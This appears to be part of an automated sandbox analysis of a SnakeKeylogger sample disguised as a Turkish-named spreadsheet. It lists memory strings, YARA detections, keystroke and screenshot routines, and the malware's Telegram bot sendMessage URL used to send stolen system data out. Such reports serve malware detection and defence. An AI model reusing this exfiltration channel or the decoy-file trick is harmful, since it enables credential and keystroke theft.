                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20a
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: InstallUtil.exe, 00000007.00000002.4495336578.0000000002F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002F5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.00000000027FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000007.00000002.4495336578.0000000002F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002C6E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49778 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49811 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49853 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

                    System Summary

                    Source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_05B14E50 NtProtectVirtualMemory,0_2_05B14E50
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_05B16388 NtResumeThread,0_2_05B16388
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_05B14E48 NtProtectVirtualMemory,0_2_05B14E48
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_05B16380 NtResumeThread,0_2_05B16380
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 3_2_05B44E50 NtProtectVirtualMemory,3_2_05B44E50
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 3_2_05B46388 NtResumeThread,3_2_05B46388
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 3_2_05B44E48 NtProtectVirtualMemory,3_2_05B44E48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 3_2_05B46380 NtResumeThread,3_2_05B46380
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 6_2_05224E50 NtProtectVirtualMemory,6_2_05224E50
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 6_2_05226388 NtResumeThread,6_2_05226388
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 6_2_05224E48 NtProtectVirtualMemory,6_2_05224E48
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Code function: 6_2_05226380 NtResumeThread,6_2_05226380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105C1472_2_0105C147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_010553702_2_01055370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105D2782_2_0105D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105C4722_2_0105C472
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105C7382_2_0105C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105E9882_2_0105E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_010569A02_2_010569A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105CA082_2_0105CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01059DE02_2_01059DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105CCD82_2_0105CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105CFAA2_2_0105CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01056FC82_2_01056FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105F6392_2_0105F639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105E97A2_2_0105E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_010529E02_2_010529E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0105FA902_2_0105FA90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06441E802_2_06441E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06440B302_2_06440B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064417A02_2_064417A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449C702_2_06449C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064450282_2_06445028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064495482_2_06449548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064425682_2_06442568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E24A2_2_0644E24A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E2582_2_0644E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06441E702_2_06441E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644DE002_2_0644DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EAF82_2_0644EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E6AF2_2_0644E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644E6B02_2_0644E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EF512_2_0644EF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EF602_2_0644EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644EB082_2_0644EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06440B202_2_06440B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064493282_2_06449328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644178F2_2_0644178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06448B902_2_06448B90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06448BA02_2_06448BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644F3B82_2_0644F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064400402_2_06440040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644FC582_2_0644FC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449C6D2_2_06449C6D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644FC682_2_0644FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064400062_2_06440006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644F8022_2_0644F802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644F8102_2_0644F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_064450182_2_06445018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D0F82_2_0644D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644CCA02_2_0644CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D5402_2_0644D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D5502_2_0644D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644DDFF2_2_0644DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D9992_2_0644D999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0644D9A82_2_0644D9A8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016969783_2_01696978
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_0169C8F83_2_0169C8F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01691BA83_2_01691BA8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01694E283_2_01694E28
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016969683_2_01696968
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016953F83_2_016953F8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016985403_2_01698540
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_016985303_2_01698530
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01698DEC3_2_01698DEC
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01696DF73_2_01696DF7
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01691C183_2_01691C18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01698F603_2_01698F60
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01696E083_2_01696E08
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_01694E183_2_01694E18
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_033400483_2_03340048
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_0334000A3_2_0334000A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1CCD83_2_05A1CCD8
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1142C3_2_05A1142C
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A146203_2_05A14620
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A100403_2_05A10040
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1C05B3_2_05A1C05B
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeCode function: 3_2_05A1CCCA3_2_05A1CCCA
